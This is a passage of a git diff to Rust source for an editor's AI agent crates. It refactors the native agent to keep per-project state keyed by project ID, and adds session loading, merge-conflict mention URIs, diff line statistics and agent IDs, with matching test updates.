self.supports_load_session = supports_load_session; + self + } + + pub fn with_agent_id(mut self, agent_id: AgentId) -> Self { + self.agent_id = agent_id; + self + } + + pub fn with_telemetry_id(mut self, telemetry_id: SharedString) -> Self { + self.telemetry_id = telemetry_id; + self + } + + fn create_session( + self: Rc, + session_id: acp::SessionId, + project: Entity, + work_dirs: PathList, + title: Option, + cx: &mut gpui::App, + ) -> Entity { + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let thread = cx.new(|cx| { + AcpThread::new( + None, + title, + Some(work_dirs), + self.clone(), + project, + action_log, + session_id.clone(), + watch::Receiver::constant( + acp::PromptCapabilities::new() + .image(true) + .audio(true) + 
.embedded_context(true), + ), + cx, + ) + }); + self.sessions.lock().insert( + session_id, + Session { + thread: thread.downgrade(), + response_tx: None, + }, + ); + thread + } + pub fn send_update( &self, session_id: acp::SessionId, @@ -603,8 +798,12 @@ mod test_support { } impl AgentConnection for StubAgentConnection { + fn agent_id(&self) -> AgentId { + self.agent_id.clone() + } + fn telemetry_id(&self) -> SharedString { - "stub".into() + self.telemetry_id.clone() } fn auth_methods(&self) -> &[acp::AuthMethod] { @@ -621,38 +820,33 @@ mod test_support { fn new_session( self: Rc, project: Entity, - cwd: &Path, + work_dirs: PathList, cx: &mut gpui::App, ) -> Task>> { static NEXT_SESSION_ID: AtomicUsize = AtomicUsize::new(0); let session_id = acp::SessionId::new(NEXT_SESSION_ID.fetch_add(1, Ordering::SeqCst).to_string()); - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let thread = cx.new(|cx| { - AcpThread::new( - None, - "Test", - Some(cwd.to_path_buf()), - self.clone(), - project, - action_log, - session_id.clone(), - watch::Receiver::constant( - acp::PromptCapabilities::new() - .image(true) - .audio(true) - .embedded_context(true), - ), - cx, - ) - }); - self.sessions.lock().insert( - session_id, - Session { - thread: thread.downgrade(), - response_tx: None, - }, - ); + let thread = self.create_session(session_id, project, work_dirs, None, cx); + Task::ready(Ok(thread)) + } + + fn supports_load_session(&self) -> bool { + self.supports_load_session + } + + fn load_session( + self: Rc, + session_id: acp::SessionId, + project: Entity, + work_dirs: PathList, + title: Option, + cx: &mut App, + ) -> Task>> { + if !self.supports_load_session { + return Task::ready(Err(anyhow::Error::msg("Loading sessions is not supported"))); + } + + let thread = self.create_session(session_id, project, work_dirs, title, cx); Task::ready(Ok(thread)) } diff --git a/crates/acp_thread/src/mention.rs b/crates/acp_thread/src/mention.rs index 
b63eec154a40de8909d13de2a4e1bd3e9d1e06f3..43dfe7610e34a0399a27a1d28858b938acfc2e0f 100644 --- a/crates/acp_thread/src/mention.rs +++ b/crates/acp_thread/src/mention.rs @@ -60,6 +60,9 @@ pub enum MentionUri { GitDiff { base_ref: String, }, + MergeConflict { + file_path: String, + }, } impl MentionUri { @@ -215,6 +218,9 @@ impl MentionUri { let base_ref = single_query_param(&url, "base")?.unwrap_or_else(|| "main".to_string()); Ok(Self::GitDiff { base_ref }) + } else if path.starts_with("/agent/merge-conflict") { + let file_path = single_query_param(&url, "path")?.unwrap_or_default(); + Ok(Self::MergeConflict { file_path }) } else { bail!("invalid zed url: {:?}", input); } @@ -245,6 +251,13 @@ impl MentionUri { } } MentionUri::GitDiff { base_ref } => format!("Branch Diff ({})", base_ref), + MentionUri::MergeConflict { file_path } => { + let name = Path::new(file_path) + .file_name() + .unwrap_or_default() + .to_string_lossy(); + format!("Merge Conflict ({name})") + } MentionUri::Selection { abs_path: path, line_range, @@ -306,6 +319,7 @@ impl MentionUri { MentionUri::Selection { .. } => IconName::Reader.path().into(), MentionUri::Fetch { .. } => IconName::ToolWeb.path().into(), MentionUri::GitDiff { .. } => IconName::GitBranch.path().into(), + MentionUri::MergeConflict { .. 
} => IconName::GitMergeConflict.path().into(), } } @@ -409,6 +423,11 @@ impl MentionUri { url.query_pairs_mut().append_pair("base", base_ref); url } + MentionUri::MergeConflict { file_path } => { + let mut url = Url::parse("zed:///agent/merge-conflict").unwrap(); + url.query_pairs_mut().append_pair("path", file_path); + url + } } } } diff --git a/crates/acp_tools/src/acp_tools.rs b/crates/acp_tools/src/acp_tools.rs index b5b0e078ae0e41f5c3527265009fac803757ff1a..30d13effcb53395972879ef109a253be0c134ec1 100644 --- a/crates/acp_tools/src/acp_tools.rs +++ b/crates/acp_tools/src/acp_tools.rs @@ -14,7 +14,7 @@ use gpui::{ }; use language::LanguageRegistry; use markdown::{CodeBlockRenderer, Markdown, MarkdownElement, MarkdownStyle}; -use project::Project; +use project::{AgentId, Project}; use settings::Settings; use theme::ThemeSettings; use ui::{CopyButton, Tooltip, WithScrollbar, prelude::*}; @@ -48,7 +48,7 @@ pub struct AcpConnectionRegistry { } struct ActiveConnection { - server_name: SharedString, + agent_id: AgentId, connection: Weak, } @@ -65,12 +65,12 @@ impl AcpConnectionRegistry { pub fn set_active_connection( &self, - server_name: impl Into, + agent_id: AgentId, connection: &Rc, cx: &mut Context, ) { self.active_connection.replace(Some(ActiveConnection { - server_name: server_name.into(), + agent_id, connection: Rc::downgrade(connection), })); cx.notify(); @@ -87,7 +87,7 @@ struct AcpTools { } struct WatchedConnection { - server_name: SharedString, + agent_id: AgentId, messages: Vec, list_state: ListState, connection: Weak, @@ -144,7 +144,7 @@ impl AcpTools { }); self.watched_connection = Some(WatchedConnection { - server_name: active_connection.server_name.clone(), + agent_id: active_connection.agent_id.clone(), messages: vec![], list_state: ListState::new(0, ListAlignment::Bottom, px(2048.)), connection: active_connection.connection.clone(), @@ -483,7 +483,7 @@ impl Item for AcpTools { "ACP: {}", self.watched_connection .as_ref() - .map_or("Disconnected", 
|connection| &connection.server_name) + .map_or("Disconnected", |connection| connection.agent_id.0.as_ref()) ) .into() } diff --git a/crates/action_log/src/action_log.rs b/crates/action_log/src/action_log.rs index 5679f3c58fe52057f7a4a0faa24d5b5db2b5e497..3faf767c7020763eadc7db6c93af42f650a07434 100644 --- a/crates/action_log/src/action_log.rs +++ b/crates/action_log/src/action_log.rs @@ -209,7 +209,7 @@ impl ActionLog { cx: &mut Context, ) { match event { - BufferEvent::Edited => { + BufferEvent::Edited { .. } => { let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { return; }; @@ -1028,6 +1028,11 @@ impl ActionLog { .collect() } + /// Returns the total number of lines added and removed across all unreviewed buffers. + pub fn diff_stats(&self, cx: &App) -> DiffStats { + DiffStats::all_files(&self.changed_buffers(cx), cx) + } + /// Iterate over buffers changed since last read or edited by the model pub fn stale_buffers<'a>(&'a self, cx: &'a App) -> impl Iterator> { self.tracked_buffers @@ -1044,6 +1049,46 @@ impl ActionLog { } } +#[derive(Default, Debug, Clone, Copy)] +pub struct DiffStats { + pub lines_added: u32, + pub lines_removed: u32, +} + +impl DiffStats { + pub fn single_file(buffer: &Buffer, diff: &BufferDiff, cx: &App) -> Self { + let mut stats = DiffStats::default(); + let diff_snapshot = diff.snapshot(cx); + let buffer_snapshot = buffer.snapshot(); + let base_text = diff_snapshot.base_text(); + + for hunk in diff_snapshot.hunks(&buffer_snapshot) { + let added_rows = hunk.range.end.row.saturating_sub(hunk.range.start.row); + stats.lines_added += added_rows; + + let base_start = hunk.diff_base_byte_range.start.to_point(base_text).row; + let base_end = hunk.diff_base_byte_range.end.to_point(base_text).row; + let removed_rows = base_end.saturating_sub(base_start); + stats.lines_removed += removed_rows; + } + + stats + } + + pub fn all_files( + changed_buffers: &BTreeMap, Entity>, + cx: &App, + ) -> Self { + let mut total = 
DiffStats::default(); + for (buffer, diff) in changed_buffers { + let stats = DiffStats::single_file(buffer.read(cx), diff.read(cx), cx); + total.lines_added += stats.lines_added; + total.lines_removed += stats.lines_removed; + } + total + } +} + #[derive(Clone)] pub struct ActionLogTelemetry { pub agent_telemetry_id: SharedString, diff --git a/crates/agent/src/agent.rs b/crates/agent/src/agent.rs index d9ad55c7127983516dbb5fe0392ef135186b79f7..6437fd1883c9ddbb256babbb88041b4c42293a95 100644 --- a/crates/agent/src/agent.rs +++ b/crates/agent/src/agent.rs @@ -37,10 +37,11 @@ use futures::channel::{mpsc, oneshot}; use futures::future::Shared; use futures::{FutureExt as _, StreamExt as _, future}; use gpui::{ - App, AppContext, AsyncApp, Context, Entity, SharedString, Subscription, Task, WeakEntity, + App, AppContext, AsyncApp, Context, Entity, EntityId, SharedString, Subscription, Task, + WeakEntity, }; use language_model::{IconOrSvg, LanguageModel, LanguageModelProvider, LanguageModelRegistry}; -use project::{Project, ProjectItem, ProjectPath, Worktree}; +use project::{AgentId, Project, ProjectItem, ProjectPath, Worktree}; use prompt_store::{ ProjectContext, PromptStore, RULES_FILE_NAMES, RulesFileContext, UserRulesContext, WorktreeContext, @@ -48,9 +49,9 @@ use prompt_store::{ use serde::{Deserialize, Serialize}; use settings::{LanguageModelSelection, update_settings_file}; use std::any::Any; -use std::path::{Path, PathBuf}; +use std::path::PathBuf; use std::rc::Rc; -use std::sync::Arc; +use std::sync::{Arc, LazyLock}; use util::ResultExt; use util::path_list::PathList; use util::rel_path::RelPath; @@ -65,13 +66,23 @@ pub struct RulesLoadingError { pub message: SharedString, } +struct ProjectState { + project: Entity, + project_context: Entity, + project_context_needs_refresh: watch::Sender<()>, + _maintain_project_context: Task>, + context_server_registry: Entity, + _subscriptions: Vec, +} + /// Holds both the internal Thread and the AcpThread for a session struct 
Session { /// The internal thread that processes messages thread: Entity, /// The ACP thread that handles protocol communication acp_thread: Entity, - pending_save: Task<()>, + project_id: EntityId, + pending_save: Task>, _subscriptions: Vec, } @@ -235,79 +246,47 @@ pub struct NativeAgent { /// Session ID -> Session mapping sessions: HashMap, thread_store: Entity, - /// Shared project context for all threads - project_context: Entity, - project_context_needs_refresh: watch::Sender<()>, - _maintain_project_context: Task>, - context_server_registry: Entity, + /// Project-specific state keyed by project EntityId + projects: HashMap, /// Shared templates for all threads templates: Arc, /// Cached model information models: LanguageModels, - project: Entity, prompt_store: Option>, fs: Arc, _subscriptions: Vec, } impl NativeAgent { - pub async fn new( - project: Entity, + pub fn new( thread_store: Entity, templates: Arc, prompt_store: Option>, fs: Arc, - cx: &mut AsyncApp, - ) -> Result> { + cx: &mut App, + ) -> Entity { log::debug!("Creating new NativeAgent"); - let project_context = cx - .update(|cx| Self::build_project_context(&project, prompt_store.as_ref(), cx)) - .await; - - Ok(cx.new(|cx| { - let context_server_store = project.read(cx).context_server_store(); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx)); - - let mut subscriptions = vec![ - cx.subscribe(&project, Self::handle_project_event), - cx.subscribe( - &LanguageModelRegistry::global(cx), - Self::handle_models_updated_event, - ), - cx.subscribe( - &context_server_store, - Self::handle_context_server_store_updated, - ), - cx.subscribe( - &context_server_registry, - Self::handle_context_server_registry_event, - ), - ]; + cx.new(|cx| { + let mut subscriptions = vec![cx.subscribe( + &LanguageModelRegistry::global(cx), + Self::handle_models_updated_event, + )]; if let Some(prompt_store) = prompt_store.as_ref() { 
subscriptions.push(cx.subscribe(prompt_store, Self::handle_prompts_updated_event)) } - let (project_context_needs_refresh_tx, project_context_needs_refresh_rx) = - watch::channel(()); Self { sessions: HashMap::default(), thread_store, - project_context: cx.new(|_| project_context), - project_context_needs_refresh: project_context_needs_refresh_tx, - _maintain_project_context: cx.spawn(async move |this, cx| { - Self::maintain_project_context(this, project_context_needs_refresh_rx, cx).await - }), - context_server_registry, + projects: HashMap::default(), templates, models: LanguageModels::new(cx), - project, prompt_store, fs, _subscriptions: subscriptions, } - })) + }) } fn new_session( @@ -315,10 +294,10 @@ impl NativeAgent { project: Entity, cx: &mut Context, ) -> Entity { - // Create Thread - // Fetch default model from registry settings + let project_id = self.get_or_create_project_state(&project, cx); + let project_state = &self.projects[&project_id]; + let registry = LanguageModelRegistry::read_global(cx); - // Log available models for debugging let available_count = registry.available_models(cx).count(); log::debug!("Total available models: {}", available_count); @@ -328,21 +307,22 @@ impl NativeAgent { }); let thread = cx.new(|cx| { Thread::new( - project.clone(), - self.project_context.clone(), - self.context_server_registry.clone(), + project, + project_state.project_context.clone(), + project_state.context_server_registry.clone(), self.templates.clone(), default_model, cx, ) }); - self.register_session(thread, cx) + self.register_session(thread, project_id, cx) } fn register_session( &mut self, thread_handle: Entity, + project_id: EntityId, cx: &mut Context, ) -> Entity { let connection = Rc::new(NativeAgentConnection(cx.entity())); @@ -405,12 +385,13 @@ impl NativeAgent { Session { thread: thread_handle, acp_thread: acp_thread.clone(), + project_id, _subscriptions: subscriptions, - pending_save: Task::ready(()), + pending_save: Task::ready(Ok(())), }, ); 
- self.update_available_commands(cx); + self.update_available_commands_for_project(project_id, cx); acp_thread } @@ -419,19 +400,106 @@ impl NativeAgent { &self.models } + fn get_or_create_project_state( + &mut self, + project: &Entity, + cx: &mut Context, + ) -> EntityId { + let project_id = project.entity_id(); + if self.projects.contains_key(&project_id) { + return project_id; + } + + let project_context = cx.new(|_| ProjectContext::new(vec![], vec![])); + self.register_project_with_initial_context(project.clone(), project_context, cx); + if let Some(state) = self.projects.get_mut(&project_id) { + state.project_context_needs_refresh.send(()).ok(); + } + project_id + } + + fn register_project_with_initial_context( + &mut self, + project: Entity, + project_context: Entity, + cx: &mut Context, + ) { + let project_id = project.entity_id(); + + let context_server_store = project.read(cx).context_server_store(); + let context_server_registry = + cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx)); + + let subscriptions = vec![ + cx.subscribe(&project, Self::handle_project_event), + cx.subscribe( + &context_server_store, + Self::handle_context_server_store_updated, + ), + cx.subscribe( + &context_server_registry, + Self::handle_context_server_registry_event, + ), + ]; + + let (project_context_needs_refresh_tx, project_context_needs_refresh_rx) = + watch::channel(()); + + self.projects.insert( + project_id, + ProjectState { + project, + project_context, + project_context_needs_refresh: project_context_needs_refresh_tx, + _maintain_project_context: cx.spawn(async move |this, cx| { + Self::maintain_project_context( + this, + project_id, + project_context_needs_refresh_rx, + cx, + ) + .await + }), + context_server_registry, + _subscriptions: subscriptions, + }, + ); + } + + fn session_project_state(&self, session_id: &acp::SessionId) -> Option<&ProjectState> { + self.sessions + .get(session_id) + .and_then(|session| 
self.projects.get(&session.project_id)) + } + async fn maintain_project_context( this: WeakEntity, + project_id: EntityId, mut needs_refresh: watch::Receiver<()>, cx: &mut AsyncApp, ) -> Result<()> { while needs_refresh.changed().await.is_ok() { let project_context = this .update(cx, |this, cx| { - Self::build_project_context(&this.project, this.prompt_store.as_ref(), cx) - })? + let state = this + .projects + .get(&project_id) + .context("project state not found")?; + anyhow::Ok(Self::build_project_context( + &state.project, + this.prompt_store.as_ref(), + cx, + )) + })?? .await; this.update(cx, |this, cx| { - this.project_context = cx.new(|_| project_context); + if let Some(state) = this.projects.get(&project_id) { + state + .project_context + .update(cx, |current_project_context, _cx| { + *current_project_context = project_context; + }); + } })?; } @@ -594,14 +662,16 @@ impl NativeAgent { let Some(session) = self.sessions.get(session_id) else { return; }; - let thread = thread.downgrade(); - let acp_thread = session.acp_thread.downgrade(); - cx.spawn(async move |_, cx| { - let title = thread.read_with(cx, |thread, _| thread.title())?; - let task = acp_thread.update(cx, |acp_thread, cx| acp_thread.set_title(title, cx))?; - task.await - }) - .detach_and_log_err(cx); + + if let Some(title) = thread.read(cx).title() { + let acp_thread = session.acp_thread.downgrade(); + cx.spawn(async move |_, cx| { + let task = + acp_thread.update(cx, |acp_thread, cx| acp_thread.set_title(title, cx))?; + task.await + }) + .detach_and_log_err(cx); + } } fn handle_thread_token_usage_updated( @@ -620,13 +690,17 @@ impl NativeAgent { fn handle_project_event( &mut self, - _project: Entity, + project: Entity, event: &project::Event, _cx: &mut Context, ) { + let project_id = project.entity_id(); + let Some(state) = self.projects.get_mut(&project_id) else { + return; + }; match event { project::Event::WorktreeAdded(_) | project::Event::WorktreeRemoved(_) => { - 
self.project_context_needs_refresh.send(()).ok(); + state.project_context_needs_refresh.send(()).ok(); } project::Event::WorktreeUpdatedEntries(_, items) => { if items.iter().any(|(path, _, _)| { @@ -634,7 +708,7 @@ impl NativeAgent { .iter() .any(|name| path.as_ref() == RelPath::unix(name).unwrap()) }) { - self.project_context_needs_refresh.send(()).ok(); + state.project_context_needs_refresh.send(()).ok(); } } _ => {} @@ -647,13 +721,15 @@ impl NativeAgent { _event: &prompt_store::PromptsUpdatedEvent, _cx: &mut Context, ) { - self.project_context_needs_refresh.send(()).ok(); + for state in self.projects.values_mut() { + state.project_context_needs_refresh.send(()).ok(); + } } fn handle_models_updated_event( &mut self, _registry: Entity, - _event: &language_model::Event, + event: &language_model::Event, cx: &mut Context, ) { self.models.refresh_list(cx); @@ -670,37 +746,65 @@ impl NativeAgent { thread.set_model(model, cx); cx.notify(); } - thread.set_summarization_model(summarization_model.clone(), cx); + if let Some(model) = summarization_model.clone() { + if thread.summarization_model().is_none() + || matches!(event, language_model::Event::ThreadSummaryModelChanged) + { + thread.set_summarization_model(Some(model), cx); + } + } }); } } fn handle_context_server_store_updated( &mut self, - _store: Entity, + store: Entity, _event: &project::context_server_store::ServerStatusChangedEvent, cx: &mut Context, ) { - self.update_available_commands(cx); + let project_id = self.projects.iter().find_map(|(id, state)| { + if *state.context_server_registry.read(cx).server_store() == store { + Some(*id) + } else { + None + } + }); + if let Some(project_id) = project_id { + self.update_available_commands_for_project(project_id, cx); + } } fn handle_context_server_registry_event( &mut self, - _registry: Entity, + registry: Entity, event: &ContextServerRegistryEvent, cx: &mut Context, ) { match event { ContextServerRegistryEvent::ToolsChanged => {} 
ContextServerRegistryEvent::PromptsChanged => { - self.update_available_commands(cx); + let project_id = self.projects.iter().find_map(|(id, state)| { + if state.context_server_registry == registry { + Some(*id) + } else { + None + } + }); + if let Some(project_id) = project_id { + self.update_available_commands_for_project(project_id, cx); + } } } } - fn update_available_commands(&self, cx: &mut Context) { - let available_commands = self.build_available_commands(cx); + fn update_available_commands_for_project(&self, project_id: EntityId, cx: &mut Context) { + let available_commands = + Self::build_available_commands_for_project(self.projects.get(&project_id), cx); for session in self.sessions.values() { + if session.project_id != project_id { + continue; + } session.acp_thread.update(cx, |thread, cx| { thread .handle_session_update( @@ -714,8 +818,14 @@ impl NativeAgent { } } - fn build_available_commands(&self, cx: &App) -> Vec { - let registry = self.context_server_registry.read(cx); + fn build_available_commands_for_project( + project_state: Option<&ProjectState>, + cx: &App, + ) -> Vec { + let Some(state) = project_state else { + return vec![]; + }; + let registry = state.context_server_registry.read(cx); let mut prompt_name_counts: HashMap<&str, usize> = HashMap::default(); for context_server_prompt in registry.prompts() { @@ -769,6 +879,7 @@ impl NativeAgent { pub fn load_thread( &mut self, id: acp::SessionId, + project: Entity, cx: &mut Context, ) -> Task>> { let database_future = ThreadsDatabase::connect(cx); @@ -780,41 +891,49 @@ impl NativeAgent { .with_context(|| format!("no thread found with ID: {id:?}"))?; this.update(cx, |this, cx| { + let project_id = this.get_or_create_project_state(&project, cx); + let project_state = this + .projects + .get(&project_id) + .context("project state not found")?; let summarization_model = LanguageModelRegistry::read_global(cx) .thread_summary_model() .map(|c| c.model); - cx.new(|cx| { + Ok(cx.new(|cx| { let mut 
thread = Thread::from_db( id.clone(), db_thread, - this.project.clone(), - this.project_context.clone(), - this.context_server_registry.clone(), + project_state.project.clone(), + project_state.project_context.clone(), + project_state.context_server_registry.clone(), this.templates.clone(), cx, ); thread.set_summarization_model(summarization_model, cx); thread - }) - }) + })) + })? }) } pub fn open_thread( &mut self, id: acp::SessionId, + project: Entity, cx: &mut Context, ) -> Task>> { if let Some(session) = self.sessions.get(&id) { return Task::ready(Ok(session.acp_thread.clone())); } - let task = self.load_thread(id, cx); + let task = self.load_thread(id, project.clone(), cx); cx.spawn(async move |this, cx| { let thread = task.await?; - let acp_thread = - this.update(cx, |this, cx| this.register_session(thread.clone(), cx))?; + let acp_thread = this.update(cx, |this, cx| { + let project_id = this.get_or_create_project_state(&project, cx); + this.register_session(thread.clone(), project_id, cx) + })?; let events = thread.update(cx, |thread, cx| thread.replay(cx)); cx.update(|cx| { NativeAgentConnection::handle_thread_events(events, acp_thread.downgrade(), cx) @@ -827,9 +946,10 @@ impl NativeAgent { pub fn thread_summary( &mut self, id: acp::SessionId, + project: Entity, cx: &mut Context, ) -> Task> { - let thread = self.open_thread(id.clone(), cx); + let thread = self.open_thread(id.clone(), project, cx); cx.spawn(async move |this, cx| { let acp_thread = thread.await?; let result = this @@ -857,8 +977,13 @@ impl NativeAgent { return; }; + let project_id = session.project_id; + let Some(state) = self.projects.get(&project_id) else { + return; + }; + let folder_paths = PathList::new( - &self + &state .project .read(cx) .visible_worktrees(cx) @@ -875,7 +1000,7 @@ impl NativeAgent { let thread_store = self.thread_store.clone(); session.pending_save = cx.spawn(async move |_, cx| { let Some(database) = database_future.await.map_err(|err| anyhow!(err)).log_err() else { 
- return; + return Ok(()); }; let db_thread = db_thread.await; database @@ -883,21 +1008,29 @@ impl NativeAgent { .await .log_err(); thread_store.update(cx, |store, cx| store.reload(cx)); + Ok(()) }); } fn send_mcp_prompt( &self, message_id: UserMessageId, - session_id: agent_client_protocol::SessionId, + session_id: acp::SessionId, prompt_name: String, server_id: ContextServerId, arguments: HashMap, original_content: Vec, cx: &mut Context, ) -> Task> { - let server_store = self.context_server_registry.read(cx).server_store().clone(); - let path_style = self.project.read(cx).path_style(cx); + let Some(state) = self.session_project_state(&session_id) else { + return Task::ready(Err(anyhow!("Project state not found for session"))); + }; + let server_store = state + .context_server_registry + .read(cx) + .server_store() + .clone(); + let path_style = state.project.read(cx).path_style(cx); cx.spawn(async move |this, cx| { let prompt = @@ -996,8 +1129,14 @@ impl NativeAgentConnection { .map(|session| session.thread.clone()) } - pub fn load_thread(&self, id: acp::SessionId, cx: &mut App) -> Task>> { - self.0.update(cx, |this, cx| this.load_thread(id, cx)) + pub fn load_thread( + &self, + id: acp::SessionId, + project: Entity, + cx: &mut App, + ) -> Task>> { + self.0 + .update(cx, |this, cx| this.load_thread(id, project, cx)) } fn run_turn( @@ -1068,12 +1207,11 @@ impl NativeAgentConnection { thread.request_tool_call_authorization(tool_call, options, cx) })??; cx.background_spawn(async move { - if let acp::RequestPermissionOutcome::Selected( - acp::SelectedPermissionOutcome { option_id, .. 
}, - ) = outcome_task.await + if let acp_thread::RequestPermissionOutcome::Selected(outcome) = + outcome_task.await { response - .send(option_id) + .send(outcome) .map(|_| anyhow!("authorization receiver was dropped")) .log_err(); } @@ -1090,6 +1228,9 @@ impl NativeAgentConnection { thread.update_tool_call(update, cx) })??; } + ThreadEvent::Plan(plan) => { + acp_thread.update(cx, |thread, cx| thread.update_plan(plan, cx))?; + } ThreadEvent::SubagentSpawned(session_id) => { acp_thread.update(cx, |thread, cx| { thread.subagent_spawned(session_id, cx); @@ -1255,7 +1396,13 @@ impl acp_thread::AgentModelSelector for NativeAgentModelSelector { } } +pub static ZED_AGENT_ID: LazyLock = LazyLock::new(|| AgentId::new("Zed Agent")); + impl acp_thread::AgentConnection for NativeAgentConnection { + fn agent_id(&self) -> AgentId { + ZED_AGENT_ID.clone() + } + fn telemetry_id(&self) -> SharedString { "zed".into() } @@ -1263,10 +1410,10 @@ impl acp_thread::AgentConnection for NativeAgentConnection { fn new_session( self: Rc, project: Entity, - cwd: &Path, + work_dirs: PathList, cx: &mut App, ) -> Task>> { - log::debug!("Creating new thread for project at: {cwd:?}"); + log::debug!("Creating new thread for project at: {work_dirs:?}"); Task::ready(Ok(self .0 .update(cx, |agent, cx| agent.new_session(project, cx)))) @@ -1279,24 +1426,42 @@ impl acp_thread::AgentConnection for NativeAgentConnection { fn load_session( self: Rc, session_id: acp::SessionId, - _project: Entity, - _cwd: &Path, + project: Entity, + _work_dirs: PathList, _title: Option, cx: &mut App, ) -> Task>> { self.0 - .update(cx, |agent, cx| agent.open_thread(session_id, cx)) + .update(cx, |agent, cx| agent.open_thread(session_id, project, cx)) } fn supports_close_session(&self) -> bool { true } - fn close_session(&self, session_id: &acp::SessionId, cx: &mut App) -> Task> { - self.0.update(cx, |agent, _cx| { - agent.sessions.remove(session_id); - }); - Task::ready(Ok(())) + fn close_session( + self: Rc, + session_id: 
&acp::SessionId, + cx: &mut App, + ) -> Task> { + self.0.update(cx, |agent, cx| { + let thread = agent.sessions.get(session_id).map(|s| s.thread.clone()); + if let Some(thread) = thread { + agent.save_thread(thread, cx); + } + + let Some(session) = agent.sessions.remove(session_id) else { + return Task::ready(Ok(())); + }; + let project_id = session.project_id; + + let has_remaining = agent.sessions.values().any(|s| s.project_id == project_id); + if !has_remaining { + agent.projects.remove(&project_id); + } + + session.pending_save + }) } fn auth_methods(&self) -> &[acp::AuthMethod] { @@ -1325,8 +1490,12 @@ impl acp_thread::AgentConnection for NativeAgentConnection { log::info!("Received prompt request for session: {}", session_id); log::debug!("Prompt blocks count: {}", params.prompt.len()); + let Some(project_state) = self.0.read(cx).session_project_state(&session_id) else { + return Task::ready(Err(anyhow::anyhow!("Session not found"))); + }; + if let Some(parsed_command) = Command::parse(¶ms.prompt) { - let registry = self.0.read(cx).context_server_registry.read(cx); + let registry = project_state.context_server_registry.read(cx); let explicit_server_id = parsed_command .explicit_server_id @@ -1362,10 +1531,10 @@ impl acp_thread::AgentConnection for NativeAgentConnection { cx, ) }); - }; + } }; - let path_style = self.0.read(cx).project.read(cx).path_style(cx); + let path_style = project_state.project.read(cx).path_style(cx); self.run_turn(session_id, cx, move |thread, cx| { let content: Vec = params @@ -1406,7 +1575,7 @@ impl acp_thread::AgentConnection for NativeAgentConnection { fn truncate( &self, - session_id: &agent_client_protocol::SessionId, + session_id: &acp::SessionId, cx: &App, ) -> Option> { self.0.read_with(cx, |agent, _cx| { @@ -1611,6 +1780,7 @@ impl NativeThreadEnvironment { }; let parent_thread = parent_thread_entity.read(cx); let current_depth = parent_thread.depth(); + let parent_session_id = parent_thread.id().clone(); if current_depth >= 
MAX_SUBAGENT_DEPTH { return Err(anyhow!( @@ -1627,9 +1797,16 @@ impl NativeThreadEnvironment { let session_id = subagent_thread.read(cx).id().clone(); - let acp_thread = self.agent.update(cx, |agent, cx| { - agent.register_session(subagent_thread.clone(), cx) - })?; + let acp_thread = self + .agent + .update(cx, |agent, cx| -> Result> { + let project_id = agent + .sessions + .get(&parent_session_id) + .map(|s| s.project_id) + .context("parent session not found")?; + Ok(agent.register_session(subagent_thread.clone(), project_id, cx)) + })??; let depth = current_depth + 1; @@ -1929,6 +2106,8 @@ impl TerminalHandle for AcpTerminalHandle { #[cfg(test)] mod internal_tests { + use std::path::Path; + use super::*; use acp_thread::{AgentConnection, AgentModelGroupName, AgentModelInfo, MentionUri}; use fs::FakeFs; @@ -1955,18 +2134,32 @@ mod internal_tests { .await; let project = Project::test(fs.clone(), [], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store, - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); + + // Creating a session registers the project and triggers context building. 
+ let connection = NativeAgentConnection(agent.clone()); + let _acp_thread = cx + .update(|cx| { + Rc::new(connection).new_session( + project.clone(), + PathList::new(&[Path::new("/")]), + cx, + ) + }) + .await + .unwrap(); + cx.run_until_parked(); + + let thread = agent.read_with(cx, |agent, _cx| { + agent.sessions.values().next().unwrap().thread.clone() + }); + agent.read_with(cx, |agent, cx| { - assert_eq!(agent.project_context.read(cx).worktrees, vec![]) + let project_id = project.entity_id(); + let state = agent.projects.get(&project_id).unwrap(); + assert_eq!(state.project_context.read(cx).worktrees, vec![]); + assert_eq!(thread.read(cx).project_context().read(cx).worktrees, vec![]); }); let worktree = project @@ -1975,36 +2168,44 @@ mod internal_tests { .unwrap(); cx.run_until_parked(); agent.read_with(cx, |agent, cx| { + let project_id = project.entity_id(); + let state = agent.projects.get(&project_id).unwrap(); + let expected_worktrees = vec![WorktreeContext { + root_name: "a".into(), + abs_path: Path::new("/a").into(), + rules_file: None, + }]; + assert_eq!(state.project_context.read(cx).worktrees, expected_worktrees); assert_eq!( - agent.project_context.read(cx).worktrees, - vec![WorktreeContext { - root_name: "a".into(), - abs_path: Path::new("/a").into(), - rules_file: None - }] - ) + thread.read(cx).project_context().read(cx).worktrees, + expected_worktrees + ); }); // Creating `/a/.rules` updates the project context. 
fs.insert_file("/a/.rules", Vec::new()).await; cx.run_until_parked(); agent.read_with(cx, |agent, cx| { + let project_id = project.entity_id(); + let state = agent.projects.get(&project_id).unwrap(); let rules_entry = worktree .read(cx) .entry_for_path(rel_path(".rules")) .unwrap(); + let expected_worktrees = vec![WorktreeContext { + root_name: "a".into(), + abs_path: Path::new("/a").into(), + rules_file: Some(RulesFileContext { + path_in_worktree: rel_path(".rules").into(), + text: "".into(), + project_entry_id: rules_entry.id.to_usize(), + }), + }]; + assert_eq!(state.project_context.read(cx).worktrees, expected_worktrees); assert_eq!( - agent.project_context.read(cx).worktrees, - vec![WorktreeContext { - root_name: "a".into(), - abs_path: Path::new("/a").into(), - rules_file: Some(RulesFileContext { - path_in_worktree: rel_path(".rules").into(), - text: "".into(), - project_entry_id: rules_entry.id.to_usize() - }) - }] - ) + thread.read(cx).project_context().read(cx).worktrees, + expected_worktrees + ); }); } @@ -2015,23 +2216,19 @@ mod internal_tests { fs.insert_tree("/", json!({ "a": {} })).await; let project = Project::test(fs.clone(), [], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let connection = NativeAgentConnection( - NativeAgent::new( - project.clone(), - thread_store, - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(), - ); + let connection = + NativeAgentConnection(cx.update(|cx| { + NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx) + })); // Create a thread/session let acp_thread = cx .update(|cx| { - 